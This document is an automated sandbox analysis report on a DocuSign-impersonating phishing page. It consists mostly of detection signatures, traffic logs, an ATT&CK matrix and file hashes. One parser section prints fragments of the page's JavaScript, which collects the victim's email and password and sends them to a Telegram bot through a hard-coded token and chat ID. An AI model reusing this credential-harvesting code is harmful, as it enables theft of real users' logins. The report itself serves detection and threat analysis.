Edit tour

Windows Analysis Report
http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html

Overview

General Information

Sample URL:http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
Analysis ID:1591502
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Misleading page title found
Yara detected HtmlPhish10
Yara detected HtmlPhish64
AI detected suspicious Javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Submit button contains javascript call

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 4392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2476,i,16925558641123395933,9700554553027330645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 1056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_44JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.0.pages.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
      1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlAvira URL Cloud: detection malicious, Label: malware

        Phishing

        barindex
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'DocuSign' is a well-known electronic signature service., The legitimate domain for DocuSign is 'docusign.com'., The provided URL 'pub-35a1d927529e4c9684409537cf8ff63f.r2.dev' does not match the legitimate domain., The URL uses a subdomain structure that is not associated with DocuSign., The domain 'r2.dev' is not related to DocuSign and could be a cloud service provider, which is often used in phishing attempts., Presence of a password input field on a non-legitimate domain is suspicious. DOM: 1.0.pages.csv
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlPage Title: DocuSign Login - Enter your password to sign in
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlPage Title: DocuSign Login - Enter your password to sign in
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_44, type: DROPPED
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.de... This script demonstrates high-risk behaviors, including data exfiltration and dynamic code execution. It collects user credentials (email and password) and sends them to a Telegram bot, which is a suspicious and potentially malicious activity. The script also manipulates the DOM aggressively, hiding and showing different elements. Overall, the script exhibits clear signs of malicious intent and should be considered a high-risk security threat.
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: function z() { var email = window.location.hash.substr(1); //change window.location.hash.substr(1) to "xxxemail" if you are using attachment.// example // var email = "xxxemail";var ind=email.indexof("@"); var my_slice=email.substr((ind+1));var my_slice2=email.substr(ind+1,email.length);document.getelementbyid('username').value = email;document.getelementbyid('logoname').innerhtml = email;/*$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);*/}
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: function sendemail() {var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/;if (!filter.test(document.getelementbyid('username').value)) {alert('invalid email'); return false; } if (document.getelementbyid('password').value === '') { alert('please enter a valid password!'); return false; }var x = document.getelementbyid("div4"); var a = document.getelementbyid("div1"); var b = document.getelementbyid("div2"); a.style.display = "none"; b.style.display = "block"; x.style.display = "none"; var username = document.getelementbyid('username').value;var password = document.getelementbyid('password').value;var ozi = "\n=========docusignboy======\n" ozi+="email :"+username ozi+="\npass :" +password ozi+="\n============================\n" tmsend(ozi)}function tmsend(message){ var token = "7638787397:aahdnjvzecz4khxa5j6sxi8dfak8uvijtfo"; var chat_id= "6247174206"; c...
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: Number of links: 0
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: Title: DocuSign Login - Enter your password to sign in does not match URL
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: On click: sendEmail()
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: <input type="password" .../> found
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: No <meta name="author".. found
        Source: https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49836 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49923 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50005 version: TLS 1.2
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: global trafficHTTP traffic detected: GET /docu/e_protocol.html HTTP/1.1Host: pub-35a1d927529e4c9684409537cf8ff63f.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1Host: www.continentalsports.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1Host: www.continentalsports.co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /docu/e_protocol.html HTTP/1.1Host: pub-35a1d927529e4c9684409537cf8ff63f.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
        Source: global trafficDNS traffic detected: DNS query: www.continentalsports.co.uk
        Source: chromecache_44.3.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
        Source: chromecache_44.3.drString found in binary or memory: https://api.telegram.org/bot$
        Source: chromecache_44.3.drString found in binary or memory: https://logo.clearbit.com/
        Source: chromecache_44.3.drString found in binary or memory: https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49836 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49923 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50005 version: TLS 1.2
        Source: classification engineClassification label: mal92.phis.win@18/10@10/6
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2476,i,16925558641123395933,9700554553027330645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2476,i,16925558641123395933,9700554553027330645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Scripting
        Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1591502 URL: http://pub-35a1d927529e4c96... Startdate: 15/01/2025 Architecture: WINDOWS Score: 92 26 Antivirus / Scanner detection for submitted sample 2->26 28 Misleading page title found 2->28 30 AI detected phishing page 2->30 32 5 other signatures 2->32 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4 unknown unknown 6->14 16 192.168.2.6, 443, 49188, 49705 unknown unknown 6->16 18 239.255.255.250 unknown Reserved 6->18 11 chrome.exe 6->11         started        process5 dnsIp6 20 pub-35a1d927529e4c9684409537cf8ff63f.r2.dev 172.66.0.235, 443, 49725, 49726 CLOUDFLARENETUS United States 11->20 22 www.continentalsports.co.uk 95.154.228.177, 443, 49745, 49755 IOMART-ASGB United Kingdom 11->22 24 www.google.com 142.250.185.228, 443, 49717, 50006 GOOGLEUS United States 11->24

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html100%Avira URL Cloudmalware
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg0%Avira URL Cloudsafe
        https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l0%Avira URL Cloudsafe

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.google.com
        142.250.185.228
        truefalse
          high
          pub-35a1d927529e4c9684409537cf8ff63f.r2.dev
          172.66.0.235
          truetrue
            unknown
            www.continentalsports.co.uk
            95.154.228.177
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmltrue
                unknown
                https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpgfalse
                • Avira URL Cloud: safe
                unknown
                http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmltrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot$chromecache_44.3.drfalse
                    high
                    https://logo.clearbit.com/chromecache_44.3.drfalse
                      high
                      https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/lchromecache_44.3.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      142.250.185.228
                      www.google.comUnited States
                      15169GOOGLEUSfalse
                      95.154.228.177
                      www.continentalsports.co.ukUnited Kingdom
                      20860IOMART-ASGBfalse
                      239.255.255.250
                      unknownReserved
                      unknownunknownfalse
                      172.66.0.235
                      pub-35a1d927529e4c9684409537cf8ff63f.r2.devUnited States
                      13335CLOUDFLARENETUStrue
                      IP
                      192.168.2.4
                      192.168.2.6
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1591502
                      Start date and time:2025-01-15 01:43:06 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 1s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal92.phis.win@18/10@10/6
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.185.238, 64.233.167.84, 142.250.184.206, 172.217.18.110, 172.217.16.206, 142.250.184.234, 142.250.184.202, 216.58.212.138, 172.217.16.202, 142.250.186.42, 172.217.18.106, 142.250.185.74, 172.217.23.106, 172.217.16.138, 142.250.185.106, 216.58.206.74, 172.217.18.10, 142.250.74.202, 216.58.212.170, 142.250.185.138, 142.250.186.138, 142.250.186.74, 2.17.190.73, 199.232.214.172, 172.217.18.14, 142.250.185.110, 142.250.186.174, 142.250.186.46, 142.250.185.206, 142.250.186.163, 216.58.206.78, 199.232.210.172, 13.107.246.45, 2.23.242.162, 52.149.20.212
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
                      No simulations
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (65350)
                      Category:downloaded
                      Size (bytes):252205
                      Entropy (8bit):6.083975621579217
                      Encrypted:false
                      SSDEEP:6144:8ajpSYt72uB8zd3nuatHiuZ1aYxs7TA7V+se6LOt1Xf54:8a1SYtRc33CMaoQTA7V+se61
                      MD5:AC9DBD4FD1FB0ADD29A1B8703BCE9406
                      SHA1:D71E70C8AC03CF68134D5AB68DD2F05AD4B23002
                      SHA-256:6316CB80E53A87A277A3CF231119AC5BE5E8DEF905800F583841D36358EDB374
                      SHA-512:FFDFE6A01976EB9CDF1E289CA03F938952058151440C62925CCC8D1BCFA8E48EEF7A72581461FC35B10AE02853116A27AE5C70D30AF166B10FEF6C3C9F53E5CF
                      Malicious:false
                      Reputation:low
                      URL:https://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
                      Preview:<!DOCTYPE html> <html lang=en class=account-server>.<meta charset=utf-8>.<meta name=viewport content="initial-scale=1.0">.<title>DocuSign Login - Enter your password to sign in</title>..<style data-emotion=css data-single-filez-stylesheet=16>.account-server{height:100%}.site-content,#root{height:inherit}.account-server .site-content{background-color:#fff}.hide-accessible{position:absolute;width:0px;height:0px;left:-10000px}.ink-authentication{display:flex;flex-direction:column;min-height:100%}.ink-footer{flex-shrink:0}.ink-header{position:sticky;top:0;height:64px}.ink-body{background-color:#f7f6f7;overflow-y:auto;flex:1 0 auto}.ink-auth-main{padding:4rem 0;background-color:#fff;border:1px solid rgba(25,24,35,.1490196078);border-radius:.25rem}@media (max-width:1039px){.ink-body{background-color:#fff}.ink-auth-main{border:unset;border-radius:unset;padding:1.5rem 2rem}}@media (min-width:600px){.ink-body{display:flex;flex-direction:column;align-items:center}}@media (min-width:600px) and (m
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32065)
                      Category:dropped
                      Size (bytes):85578
                      Entropy (8bit):5.366055229017455
                      Encrypted:false
                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                      MD5:2F6B11A7E914718E0290410E85366FE9
                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                      Malicious:false
                      Reputation:low
                      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with no line terminators
                      Category:downloaded
                      Size (bytes):16
                      Entropy (8bit):3.875
                      Encrypted:false
                      SSDEEP:3:HwT:QT
                      MD5:344EB8D19F5C0A3435EF32FD9601F1FB
                      SHA1:E082EB1D89D91CC1A25A1D510268E576109DA07E
                      SHA-256:B44289B54959639FCA6A742F7CC2E2A5AF9C6E7B73C1B3E25227CA9790F3A587
